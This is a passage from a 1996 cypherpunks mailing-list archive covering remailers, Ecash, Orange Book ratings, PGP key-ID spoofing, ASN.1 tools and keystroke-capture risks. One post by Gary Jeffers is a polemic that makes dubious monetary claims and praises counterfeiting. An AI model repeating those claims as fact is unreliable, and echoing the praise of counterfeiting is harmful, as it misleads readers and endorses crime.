members of the press started to page through the exhibit book after
the hearing, someone from the DoJ came over and told us we weren't
allowed to look at them "since they weren't available to the public."
I argued with him, and he maintained that since they weren't _entered
into the record_ then the public had no right to see them.

How odd that the Feds are unwilling to divulge the URLs of the dirty
pix they use in their case!

I also met Cathy Cleaver, who's the director of legal studies for the
Family Research Council, and a strong supporter of the CDA. She says
she thought the hearing went well for her side. I politely disagreed.

By the end of the day, the judges might have been starting to "get
it." When Kiyoshi Kuromiya testified about his Critical Path AIDS
Project web site, which carries safe sex information, the judges
grilled him about the number of minors in the USA with HIV. Later, one
Patricia Warren from Wildcat Press: "Is it easier to create an ezine
than a magazine?" Another asked her if "gay and lesbian information is
likely to be censored?"

Tomorrow morning Professor Donna Hoffman of Vanderbilt University will
testify. (She was instrumental in debunking Marty Rimm's fraudulent
cyberporn study. <http://www.cs.cmu.edu/~declan/rimm/>)

Stay tuned for more reports.


-----------------------------------------------------------------------------

The DoJ's case has been rescheduled to April 12th and April 15th.

For more information and breaking updates, check out:
  http://fight-censorship.dementia.org/top/

Other relevant web sites:
  http://www.eff.org/
  http://www.cdt.org/
  http://www.aclu.org/

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Fri, 22 Mar 1996 18:26:06 +0800
To: cypherpunks@toad.com
Subject: Re: Minneapolis Star Tribune this morning (fwd)
Message-ID: <m0tzy7D-000CJlC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> 
> Charles Gimon wrote:
> > Mpls. Strib did a piece this morning, front page, about AltaVista,
> > Dejanews, etc. Well-worn territory to readers of this list. Your
> > words can come back to haunt you, all that stuff. One paragraph that
> > deserves rebuttal from those of you who are better-informed:
> > 
> > "Of course, technology is working on solutions to itself, but
> >    mechanisms that would hide the name of a message's author, such as
> >    cryptography and anonymous remailers, are convoluted and incomplete."
> 
> Rebuttal? Why?  Remailers generally are.  There aren't enough penet.fi 
> type remailers, which people prefer not only because there is a mapping 
> but because it's easier to use.  (It's also a bit more secure if there
> are c2-nym remailers mapped to penet.fi type remailers in various
> countries).
> 
> Not everyone is on a system that is PGP-friendly.  Handling PGP-messages
> from commercial services or even most mailer apps is awkward at best,
> and the commands for mixmaster/c'punk remailers are not as standard as
> they could be.  (A PGP3 DLL would improve the use of crypto and anon-
> remailers quite a bit.)
> 
> From the excerpt you posted, it doesn't seem as if they were criticizing
> remailers... which is a pretty good thing.
> 
I'd rate the whole article as neither good nor bad. It was on the front
page of the paper edition, so I was a little unhappy at an offhand remark
that might discourage people from using remailers. 

I'm planning on doing the letters-to-the-editor thing, emphasis on saying
good things about remailers.

The whole article is online at the site mentioned.

> > 
> > Author was Jonathan Gaw; no e-mail address given. Star Tribune Online
> > is at http://www.startribune.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 22 Mar 1996 23:20:28 +0800
To: cypherpunks@toad.com
Subject: Ecash API about to be released
Message-ID: <v02120d05ad77f85bc667@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


With the Ecash API due to be released within a matter of days, I would
welcome anyone on this list interested in building applications on top of
such an API to contact me. The API will determine the calls to a libecash
that DigiCash will provide.

Try to send emails that contain "I would like to code..." and please don't
send the ones that contain "it would be nice if someone coded..."

:-)


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 Mar 1996 18:25:13 +0800
To: cypherpunks@toad.com
Subject: DAZ_zle
Message-ID: <199603220353.WAA16495@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Foreign Affairs, March/April, 1996, features two policy
   essays on "The Information Edge: A technological change is
   transforming the nature of power and the United States is
   clearly in the lead."

   In "America's Information Edge," Joseph S. Nye, Jr.  former
   Chairman of the National Intelligence Council and Assistant
   Secretary of Defense, and Admiral William A. Owen, former
   Vice Chairman of the JCS, argue that information technology
   is transforming knowledge, and thereby power. They write of
   a "system of systems, an integration of ISR, C4I and
   precision force, which represents a qualitative change in
   U.S. military capabilities." They envision informational
   "soft power" -- the ability to achieve outcomes in
   international affairs through attraction rather than
   coercion -- as reinforcing the "information umbrella"
   shielding allies in lieu of the nuclear option.

   In "A Revolution in Warfare," Eliot A. Cohen, Professor of
   Strategic Studies at Johns Hopkins, takes issue with Nye
   and Owen on the radical impact of information technology,
   and argues that its revolutionary dazzle may distort
   historical understanding of the more general political and
   economic forces that are reshaping international and
   military affairs. He observes that misunderstanding of
   revolutionary technology all too often has had unexpected,
   disastrous, consequences: "A revolution in military affairs
   is under way. It will require changes of a magnitude that
   military people still do not completely grasp and political
   leaders do not fully imagine."


   DAZ_zle






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Mar 1996 21:59:26 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603220713.XAA03976@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 PM 3/21/96 -0800, David Loysen <dwl@hnc.com> wrote:
>I don't see any reason a C2 or B2 system can't be networked to another
>system(s) with the same classification. But that isn't really what I meant.
>Can you make a firewall system that is C2 compliant? Isn't this what you
>would need in order to connect a C2 system or network to another non secure
>network, (i.e. the internet)?

Leaving out Red Book details (since back when I last read the Red Book,
nobody really had any general solutions to the problems), the problem is that
the Orange Book demands that for C-level and above, the operating system
must know the identity of all the users so it can track file, process,
and authentication accesses, and for B1 and up, it also needs to know
what users are allowed to use what security levels and what levels they're
actually operating at.

1) It's difficult to do that - you have to trust the messages coming over
a wire from the other machine to tell you who they're from, unless you can
be sure there's only one user per wire.  That means you need a mechanism
for trusting the other machine, a mechanism for communicating that trust,
a shared or mappable mechanism for identifying users, etc.
That takes a certain amount of work even when you control all the machines
that your machine can talk to, which you often can't (e.g. on an outer
firewall.)

2) To _certify_ a system for general use (as opposed to certifying a specific
instantiation of a system), you need to be sure that it will be installed
and maintained in a way that will provide that identification and assurance.
That's even harder, because you either need cryptographic authentication
and session control, or else you need a way to guarantee that the system
you're certifying only talk to machines that are administered in coordination
with it, in spite of being installed by some Army grunt or military contractor
who may RTFM but isn't a security wizard.  And in the C2-certification biz,
"cryptographic" means "something you got from the NSA", because they're the
ones who do military crypto, and they tend not to trust software.
Fortezza cards may do this stuff ok....

3) The networking code becomes part of the Trusted Comptuting Base,
which means you have to be able to verify that it can't mess with anything
that you don't want it messing with, and if it supports more than one
simultaneous user, it's got to be able to keep track of sessions and
communicate them reliably to the OS and TCB.  That works relatively well
for serial-port user logins and maybe uucp.  

TCP/IP, on the other hand, is typically implemented down in the guts of the OS,
partly because IP needs to talk to hardware a lot, partly because it's
often easier to do the TCP and IP together, partly for "speed", and partly
because it's much more efficient to hand stuff to multiple users from kernel
space than to hand it up to a user-space application which then IPCs things
back through the kernel to their destination user processes.
It also tends to have various pieces running as root, either to access
hardware or protected parts of the software, or to make it easier
to transfer ownership of information to processes owned by different users.
(Yes, this is a Unix-centric view, but other systems tend to do similar stuff.)

This makes it difficult to verify that it's clean (hey, parts of it are
tough enough to get working really well, much less bug-free), and
it's even tougher at higher levels like B2 that want Least Privilege
rather than having a SuperUser root that can do everything.
Root stuff is just basically dangerous anyway.  And B1-level OSs often run
the TCB (including root) at System Low to make sure no regular user can 
mess with it, which makes it hard for root-owned processes to write up to users.


        
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 23 Mar 1996 11:07:58 +0800
To: coderpunks@toad.com
Subject: Maybe not (was "PC: Using BIOS Wait function as a source of entr
Message-ID: <199603220446.XAA21329@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



I did some more tests with the variation when sampling the timer 
before and after a call to the BIOS Wait function on my PC.  Set the 
delay to 977ms, which is allegedly the counter's resolution and 
collected samples at even intervals (various ones) and found 
recurring patterms.  For instance, sampling every timer tick (about 
55ms) produced a repeating pattern where every 16th sample had a 
delta well over 1200 while all the others were under 900, usually 
under 800.  Every so often the 16th sample delta was very low instead 
(between 400 and 600).

Plotting the samples in a noise sphere showed very definite streaks 
with a few spots in isolated areas.

So this is NOT a good method to use after all.

I'm still curious as to what causes the variation.  Maybe has to do 
with the CPU cache or port interfaces with the CMOS timer?

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 22 Mar 1996 18:18:35 +0800
To: Sandy Sandfort <anonymous-remailer@shell.portal.com
Subject: Re: A MODEST PROPOSAL
Message-ID: <199603220752.XAA15483@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:03 AM 3/20/96 -0800, Sandy Sandfort wrote:
>(Did I get the style right?)  C'punks, if you feels as I do, 
>please take a few moments to sign up for the LIST OF SHAME?  
>Let's show Bill, Bruce, Matt and all the others what most 
>Cypherpunks really think about them and Mr/Ms Anonymous.

Please add my name.  I don't abandon my friends when I disagree with them.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim@dierks.org (Tim Dierks)
Date: Fri, 22 Mar 1996 19:08:17 +0800
To: cypherpunks@toad.com
Subject: Re: ASN.1 Tools/Compilers
Message-ID: <v02140b01ad781d763403@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 AM 3/21/96, Frederick Zarndt wrote:
>Does anyone know of reliable ASN.1 tools/compilers suitable for use on a
>wide range
>platforms?
>
>I already know about the following tools/compilers, but I would appreciate
>comments
>anyone cares to make:
>
>    ISODE (who to contact for the DE?)
>    Snacc
>
>Thanks.
>
>Frederick Zarndt
>Senior Software Engineer
>Novell, Inc
>122 East 1700 South
>Provo UT 84606
>USA
>
>Tel  801 429-3348
>Fax. 801 429-3500

I've recently been looking into this as well. I haven't looked at ISODE
yet. Snacc looks reasonable, but can't handle big integers (> 2^32), which
may make it hard to use for certificates, due to embedded RSA keys; I
haven't yet checked to see what could be done about this. It's free; the
compiler is under the GNU license, but the runtime is redistributable
without fee or onerous restriction.

I also spoke to a company in NJ, Open Systems Solutions (609.987.9073), but
their licensing terms were too expensive for my purposes. Their product
runs on a lot of platforms and sounds very complete, but requires a
licensed run-time environment. They currently support C and Pascal; C++ is
coming. Their development environment starts at $11,500.

I'm also searching for an ASN.1 product. We can afford to pay for a
compiler, but we need unrestrained distribution of the runtime in source
form. Any information would be greatly appreciated.

You may wish to examine the ASN.1 homepage @:
         http://www.inria.fr/rodeo/personnel/hoschka/asn1.html

Best,
 - Tim

Tim Dierks - Software Haruspex - tim@dierks.org
Hastening the heat-death of the universe since 1968.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 22 Mar 1996 18:59:21 +0800
To: cypherpunks@toad.com
Subject: Re: (X:x)e$ 's other use
In-Reply-To: <9603220839.AA14552@ns.htc.net>
Message-ID: <Pine.SUN.3.91.960322010454.15790A-100000@elaine36.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Digital cash, if people can be convinced to trust it, will be a wonderful 
thing because of its security, convenience, and anonymity features. I'm 
sorry, but I just don't buy this "corrupt currency" schtick.

On Fri, 22 Mar 1996, Gary Lee Jeffers wrote:

>    I believe that secret e$'s other use has been overlooked: That is,
> e$ would be a sound money replacement for the corrupt currency that
> every large state in the world currently pushes. Especially if e$
> can be redeemed in something of real value on demand.

But it can't.

Please define "something of real value." Please explain why it will 
always represent the same value to all people, and why it makes sense to 
pin your money to it rather than letting it float.

Money is a convenient fiction that makes civilization work reasonably well
most of the time. The value of money is always set by fiat and social
consensus. People who reminisce about "the gold standard" are talking
ahistorical nonsense. "The gold standard" was fiat money too. The price
and transportation of gold was controlled by governments. The move away
from "the gold standard" was a recognition of this fact, nothing more.

>    Note that the book DREAMS COME DUE made the distinction between money
> and currency. The author used the word money for real money and the word
> currency for false money. It may be the author's private distinction.

With all due respect, I think he should have kept it private.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 22 Mar 1996 04:23:19 +0800
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Electronic Frontiers Houston Cyber-Political Questionaire.
Message-ID: <31520771.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


FOR IMMEDIATE RELEASE

Electronic Frontiers Houston
2476 Bolsover, Suite 145
Houston, Texas  77005
(713) 917-5000 voice // (713) 917-5005 fax
Internet: efh@efh.org
Web site: http://www.efh.org/
Contact:  Robbie Westmorland

Electronic Frontiers Houston Cyber-Political Questionnaire.

Electronic Frontiers Houston has sent all candidates
(who survived the recent primaries), a questionnaire relating
to the politics of cyberspace.

Recently, many questions have arisen relating to the politics
of computer networking. These questions often relate to censorship,
encryption, or public access to networks. It is important that
the public know the candidates' views on these important issues.

All candidates will be asked the following questions:
If you or your campaign have an Internet electronic mail address, please provide it here:

Please answer the questions on the reverse side.  Attach additional pages if required.

1. Do you think that electronic publishing should enjoy the constitutional
protections that accrue to print media?
2. Do you think that electronic publishing should enjoy the constitutional
protections that accrue to broadcast media?
3. Do you think that electronic publishing should enjoy the constitutional 
protections that accrue to libraries?
4. Do you favor new laws to regulate the content of electronic media?
5. Do you think that the First Amendment rights of free speech protect 
private use of encryption?
6. Do you favor laws to regulate the private use of encryption?
7. Do you agree with restrictions on the export of technology that 
incorporates cryptography?
9. Do you support the right of a private individual too publish printed 
materials anonymously?
10. Should the government play a role in providing access to computer 
networks?
11. Do you think that the government should guarantee universal 
access to computer networks?
12. Do you think that access to government computerized information 
is a right?
13. Should all governmental records that are available to the public be 
made available via computer resources?
14. Should access to computerized governmental records be free?
15. Should the government regulate electronic financial transactions 
and require traceability?
16. Do you approve or disapprove of the wiretap provisions in the 
1994 Digital Telephony bill?
17. Do you favor expanding law enforcement access to telephonic 
communications?

In addition, candidates for national office will be asked the
following additional question:
18. Do you favor legislation which would require a national ID card?

Candidates for state office will be asked the following question:
18. Should laws requiring fingerprints to acquire/renew drivers licences 
be repealed?


Electronic Frontiers Houston is a non-profit group that supports civil 
liberties and the development of culture in cyberspace.
-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Lee Jeffers <gjeffers@ns.htc.net>
Date: Fri, 22 Mar 1996 21:57:02 +0800
To: cypherpunks@toad.com
Subject: (X:x)e$ 's other use
Message-ID: <9603220839.AA14552@ns.htc.net>
MIME-Version: 1.0
Content-Type: text/plain


                    (X=:x)e$ 's other use.

My dear fellow Cypherpunks,

   I believe that secret e$'s other use has been overlooked: That is,
e$ would be a sound money replacement for the corrupt currency that
every large state in the world currently pushes. Especially if e$
can be redeemed in something of real value on demand.

   As some of us know, the U.S. Fed State's Federal Reserve Notes are
corrupt currency. The corruption is at 5 different levels:

1. They are DEBT currency - they are lent into existence and it is
mathematically impossible to pay off this debt. If you borrow $100, then
where do you get the interest - say 8% since all FRN's are borrowed into
existence?. This turns the great majority of Americans into victims. If
you want freedom for your citizens, you do NOT allow monopoly DEBT
currency. Note: bankruptcies & good counterfeiting are the only ways.

2. Fractional Reserve Banking. That means that the bank can lend out
several times the money that it actually has. I believe that that is
currently 8 times but that is a rough estimation.

3. Fiat money. That means that FRN's are backed by nothing more than the
willingness of banks to redeem them with other FRN's.

4. Private banks with monopoloy privledges issue the currency. The
Federal Reserve is a private (non-U.S. State) institution with the mono-
poly on U.S. currency manufacture. The U.S. Treasury prints the currency
for the Federal Reserve. Other major states have similar arrangements. These
major banks are properly called Central Banks. To turn your currency
ownership over to a private Central Bank is monstrous! If the people
knew what was going on, the U.S. Federal State would be destroyed along
with the hidden ruling class.

5. The Legal Tender Laws. These laws force the acceptance of FRN's
in the U.S.. "This money good for all debts public and private".

   Note that the book DREAMS COME DUE made the distinction between money
and currency. The author used the word money for real money and the word
currency for false money. It may be the author's private distinction.

    I suggest that Iran did us a good turn in making and passing billions
of dollars worth of uncatchable hundred dollar bills: they allowed the
retirement of billions of dollars of debt for the American people without
forcing Americans into bankruptcy. In a debt currency economy, good count-
terfeiting is GOOD! It adds superior counterfeit to the mass of "legiti-
mate" counterfeit. kind of improves the pool :-)

   Secret e$ offers the possibility of ridding ourselves of the slavery
of private monopoly money issue. It would also give us a choice in what
currency that we would like to use. Another possibility is that due to its
high quality, it would be used during depressions and would possibly
even break depressions. Its extremely FLUID nature might also be a pro-
tection against depressions. It would be a TRUE MONEY and would give the
people the advantages of true money. Let me emphasize: we do not current-
ly have REAL money nor do the people of the other major States. We do not
know what real money is like.

   Another possibility exists with secret e$: that several different kinds
could exist. They would all be convertible into each other, of course.
Major differences?: Different redeemablity schemes, etc..

   Secret e$ offers more that just the freedom of private transactions
(as great as that is). It also offers us the power and freedom of true
money!



Central power is stolen freedom.
THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph L. Moll" <jmoll@acquion.com>
Date: Fri, 22 Mar 1996 20:52:10 +0800
To: cypherpunks@toad.com
Subject: protection on IoMega ZIP drives
Message-ID: <2.2.32.19960322120637.006acd68@mail.acquion.com>
MIME-Version: 1.0
Content-Type: text/plain


This is in regard to the now popular ZIP disks, the removable 100MB
cartridge for PC's/MAC's.

Anyone have any idea how secure the ZIP disk is once it is "protected?"  I
know that the disk will refuse to be mounted without the passkey, but what
is really happening here?


Best Regards,
---
Joseph (Joe) L. Moll  mailto:jmoll@acquion.com
Network/Communications Engineering
http://www.acquion.com  phone:864-281-4108  fax:864-281-4576
Acquion, Inc.  Greenville, SC  USA -- Specialists in Electronic Commerce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Sat, 23 Mar 1996 01:54:29 +0800
To: WThinker <weinberg@accessus.net>
Subject: Re: LET'S ROCK!!!!
In-Reply-To: <199603221326.HAA22835@mtvernon1.accessus.net>
Message-ID: <Pine.SUN.3.91.960322070632.9231A-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Mar 1996, WThinker wrote:
-snip-
> I need some ideas to eather get through to her,
> or really fuck up the mailing list.
> 
> Any ideas?
> 
> WThinker

Sure, start your own list.

Chuck (nonthinker)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 23 Mar 1996 07:43:13 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <1.5.4b11.32.19960322131211.006d298c@softserv.spectrum.titan.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 10:21 AM 3/21/96 -0800,  David Loysen <dwl@hnc.com> wrote:
>>>The fine print says its insecure as soon as its connected to a network. 
>>Ain't nothing fine about that print. An operating system or piece of
>>hardware may be C2 certifiable. But only a complete system in a specific
>>configuration can be certified as C2 compliant. The way I read the orange
>>book, no system with a network connection can ever be C2. 

To address that problem, they wrote the Trusted Network Interpretation a few years after the Orange Book

Mike Tighe
tighe@spectrum.titan.com
http://www.tcst.com/~tighe/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 23 Mar 1996 07:36:16 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <1.5.4b11.32.19960322131321.006d1880@softserv.spectrum.titan.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Basically, I'm now questioning the C2 rating of Windows NT.  The 
>> entire security layer is  modular to the Kernel.  As a modular 
>> driver, it can be removed, rewritten, and replaced.   

Has the product actually been evaluated and put on the EPL? Or is Microsoft just claiming it meets the C2 requirements?
Mike Tighe
tighe@spectrum.titan.com
http://www.tcst.com/~tighe/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: weinberg@accessus.net (WThinker)
Date: Fri, 22 Mar 1996 22:39:50 +0800
To: cypherpunks@toad.com
Subject: LET'S ROCK!!!!
Message-ID: <199603221326.HAA22835@mtvernon1.accessus.net>
MIME-Version: 1.0
Content-Type: text/plain


Ok, here is the situation.  I have a person mad at me in one of my mailing
lists.  Turns out, this person was the owner of the mailing list!  Well now
I'm stuck, knocked out of the list.  The owner can not see any of my mail,
no matter how hard I try.  I need some ideas to eather get through to her,
or really fuck up the mailing list.

Any ideas?

WThinker

P.S. please E-Mail directly to me.  If you can.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WThinker       
Social Deviant, W.W., and CHIPs expert!         
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 23 Mar 1996 01:04:05 +0800
To: cypherpunks@toad.com
Subject: Re: A funny story [noise]
Message-ID: <2.2.32.19960322142245.00693c74@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


At 08:52 PM 3/21/96 PST, hoz@univel wrote:
>>... someone had left thier keys in the door lock. 
>> So being the good cypherpunk that I am I jumped out and grabbed the 
>>keys from the lock, then knocked on the window. The passenger rolled 
>>down the window and accepted the keys back. Much to my surprise the 
>>passenger was none other than Whitfield Diffie.
>
>Let me get this straight.  You performed a key exchange with
>Whitfield Diffie?  His keys were publicly available, and you 
>securely transferred them back again?  What a concept!

Weren't those his _private_ keys, though?  You probably shouldn't be able
to transfer those in a secure system.

ObCrypto: would the transfer of private keys be necessarily a good
thing?  Or would a transfer of "reputation" be a better idea?
Example: suppose, and this is _very_ hypothetical, that the President
of the U.S. has a PGP key.  (We can dream, eh?)  Would it be
wiser to transfer that key from one President to the next, or have
the President sign the President-elect's new key?  
(I'm stretching here - feel free to killfile me.)

dave



--- David Smith, Intellecutal Terrorist
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 22 Mar 1996 10:13:58 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: MS self-generated X.509 validity?
In-Reply-To: <2.2.32.19960320174659.00687e44@arn.net>
Message-ID: <Pine.SOL.3.91.960322082943.13350B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 20 Mar 1996, David K. Merriman wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> I've just had a chance to go through the SDK MS is giving away for their
> ActiveX package. Interestingly, there's a little utility included for
> generating X.509 certs. The read.me that is included claims that the certs
> so generated don't have any real validity, as they're not linked to anything
> in the known universe (paraphrasing :-).
> 
> My question is, is this an otherwise usable cert? I'll be happy to give
> anyone interested a copy of the files (shellback.cer and shellback.spc) I
> generated, if they'd like to examine/validate them.

Send them to me and I'll have a look and comment on them if you like.
I have a few tools for pulling apart X509/ASN.1 objects :-)

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whitfield.diffie@Eng.Sun.COM
Date: Sat, 23 Mar 1996 05:34:17 +0800
To: cypherpunks@toad.com
Subject: Thanks for the keys
Message-ID: <9603221753.AA18913@ushabti.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain



    I would like to thank the gentleman, who identified himself only
as a cypherpunk, who fetched my keys out of the door of my wife's car
(I frequently leave keys sticking in the doors of cars), knocked on
the window, and handed them to me.

   To those who have seen the Equinox TV piece on cryptography, I
will remark that it was the same set of keys and the same car
that appeared on that show.
					Whit






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 23 Mar 1996 03:56:16 +0800
To: pgp-friends@fiction.pb.owl.de
Subject: Re:  PGP key spoofing
Message-ID: <199603221700.JAA23618@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: christopher@nescio.zerberus.de (Christopher Creutzig)
>  I think I have realized a serious flaw in PGPs key-handling. This may 
> lead to people using and signing bogus keys despite the usual security 
> measures.
> 
>  The problem is that PGP fails to differentiate between two keys sharing 
> the same 64-bit-Key-ID. It is not a real problem to generate a key with a 
> given key-ID (just take a prime, invert the desired key-ID modulo this 
> prime and look for another prime whose lower bits are the same as in the 
> number you just calculated), so the following attack would be possible:

PGP checks specifically for the case of keys whose IDs match but the
keys themselves differ.  It has always been obvious that keys can easily
be synthesized with given IDs.  I added this warning in version 2.0
about four years ago, in the keyadd code:

"\n\007Warning: Key ID %s matches key ID of key already on
key ring '%s', but the keys themselves differ.
This is highly suspicious.  This key will not be added to ring.
Acknowledge by pressing return: "

>  If the owner of the correct key does not give a fingerprint, but rather 
> a disk with the correct key to the person you are trying to fool, his or 
> her pgp won't ring alarm bells when reading the key (apart from possibly 
> a failed signature), but rather will tell him the key is already there. 

As you can see, it does in fact literally ring an alarm bell - the "\007"
above is the ASCII bell character.

Disclaimer: I have not worked on PGP since version 2.0 so possibly my
code has been changed or eliminated, but I think that is unlikely.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Mar 1996 05:34:26 +0800
To: cypherpunks@toad.com
Subject: Re: Ecash API about to be released
Message-ID: <m0u0Ajq-00090vC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 3/21/96 -0800, Lucky Green wrote:
>With the Ecash API due to be released within a matter of days, I would
>welcome anyone on this list interested in building applications on top of
>such an API to contact me. The API will determine the calls to a libecash
>that DigiCash will provide.

For obvious reasons, I am interested in ecash with full payee, as well as 
payer, anonymity.  Last I heard, Digicash didn't provide this.  Any updates?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@appstate.campus.mci.net (Ken Kirksey)
Date: Sat, 23 Mar 1996 01:26:52 +0800
To: cypherpunks@toad.com
Subject: Mac Keystroke Capture
Message-ID: <v02130501ad78532989bb@[206.24.84.96]>
MIME-Version: 1.0
Content-Type: text/plain


I've always warned my network users and other clients against using software
that "protects" you from data loss by capturing your keystrokes, e.g.
NowSave, Last Resort, and Thunder 7's Ghostwriter feature.

NowSave 6.0 adds a new wrinkle to the problem, as I discovered yesterday
when I installed the Now Utilities 6.0 public beta.  NowSave 6.0 has
a new feature:  when you re-start your machine after a system crash, NowSave
automatically opens at startup a SimpleText file containing all the keystrokes
it captured before the crash.  My machine crashed yesterday during an
internet session, and when it re-started I was greeted with a SimpleText
window containing my internet account password, two CryptDisk passphrases,
and my PGP passphrase.  This is not a good thing.

But it could be a good thing, IMHO.  Most people install these programs
without realizing exactly what they do.  With this new version of Now Utilities,
users are likely to be greeted with a screenful of information, as I was,
that they would just as soon not have saved anywhere on their hard drive.
This kind of incident would, hopefully, encourage them not to use key capture
software.  One can only hope...

Ken

= Ken Kirksey             | If Pat Buchanan is elected President of the   =
= Mac Developer &         | United States, at least the trains will run   =
=  Resident Cypherpunk    | run on time.                                  =
= kkirksey@appstate.campus.mci.net                             - Me       =






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lowry <jlowry@bbn.com>
Date: Sat, 23 Mar 1996 01:29:14 +0800
To: tim@dierks.org
Subject: Re: ASN.1 Tools/Compilers
Message-ID: <199603221451.JAA12020@dave.bbn.com>
MIME-Version: 1.0
Content-Type: text/plain


Not to toot my own horn, but take a look at
http://ests.bbn.com for a free ASN.1 to C++ compiler that runs on
solaris 1 and 2 and has been ported (with relatively little effort)
to Windows.  Free for non-commercial use.  Commercial use terms
have unrestricted rights for runtime.

> From <@relay3.uu.net:owner-cypherpunks@toad.com> Fri Mar 22 06:36 EST 1996
> Mime-Version: 1.0
> Date: Fri, 22 Mar 1996 01:12:27 -0800
> To: cypherpunks@toad.com
> From: tim@dierks.org (Tim Dierks)
> Subject: Re: ASN.1 Tools/Compilers
> Cc: frederick_zarndt@novell.com (Frederick Zarndt)
> 
> At 10:29 AM 3/21/96, Frederick Zarndt wrote:
> >Does anyone know of reliable ASN.1 tools/compilers suitable for use on a
> >wide range
> >platforms?
> >
> >I already know about the following tools/compilers, but I would appreciate
> >comments
> >anyone cares to make:
> >
> >    ISODE (who to contact for the DE?)
> >    Snacc
> >
> >Thanks.
> >
> >Frederick Zarndt
> >Senior Software Engineer
> >Novell, Inc
